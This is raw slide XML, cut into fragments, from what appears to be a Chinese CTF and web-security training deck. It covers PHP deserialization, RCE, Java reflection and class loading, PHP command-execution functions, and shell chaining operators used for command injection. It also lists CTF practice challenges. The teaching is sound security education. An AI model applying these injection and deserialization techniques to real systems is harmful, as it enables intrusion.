              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7748905" y="250190"/>
            <a:ext cx="4167505" cy="560514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68675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.1.RCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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7295" y="454025"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1328420" y="1307465"/>
            <a:ext cx="9695815" cy="3114675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NSSCTF-[SWPUCTF 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>新生赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]pop  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>演示）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NSSCTF-[SWPUCTF 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>新生赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]ez_unserialize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NSSCTF-[SWPUCTF 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>新生赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]no_wakeup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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68675" y="3056890"/>
            <a:ext cx="5435600" cy="499110"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.4.Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础</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80160" y="812800"/>
            <a:ext cx="9794875" cy="5635625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反射</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、类加载（类装载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>初始化）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>看代码学，网上文章很多，自己去找，或者看我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路线</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36345" y="422910"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>反射</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="1309370"/>
            <a:ext cx="7618095" cy="4238625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051425" y="641350"/>
            <a:ext cx="6841490" cy="55759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402715" y="107315"/>
            <a:ext cx="8445500" cy="6061710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679450" y="6327775"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>展示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码</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91590" y="571500"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>执行特性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1291590" y="1177925"/>
            <a:ext cx="6598285" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" tooltip="" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://xz.aliyun.com/news/6642</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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48410" y="528320"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>类加载</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686435" y="1199515"/>
            <a:ext cx="10825480" cy="3982720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类加载器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Classloader),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>负责动态加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JVM(Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>虚拟机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存空间中的一种加载器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与普通程序不同的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>并不是本地的可执行程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JVM(Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>虚拟机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后再把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>里头运行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>负责加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的这部分就叫做类加载器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Classloader)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818005" y="2787015"/>
            <a:ext cx="7620635" cy="38163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1824990" y="272415"/>
            <a:ext cx="7701915" cy="62776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53820" y="490855"/>
            <a:ext cx="4064000" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>代码块加载顺序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>字节码加载（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>defineClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s2Sys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60475" y="534670"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173480" y="1635125"/>
            <a:ext cx="9925050" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程代码执行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Remote Code Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程命令执行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Remote Command Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173480" y="2902585"/>
            <a:ext cx="10048875" cy="2976245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为什么要远程执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由器、防火墙、入侵检测等设备的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理界面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动化运维的管理系统</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3175" y="485140"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>命令执行函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099820" y="1388110"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189355" y="1861820"/>
            <a:ext cx="9564370" cy="42144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3175" y="485140"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>命令执行函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174115" y="1424940"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273175" y="1954530"/>
            <a:ext cx="9443085" cy="42056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8890" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
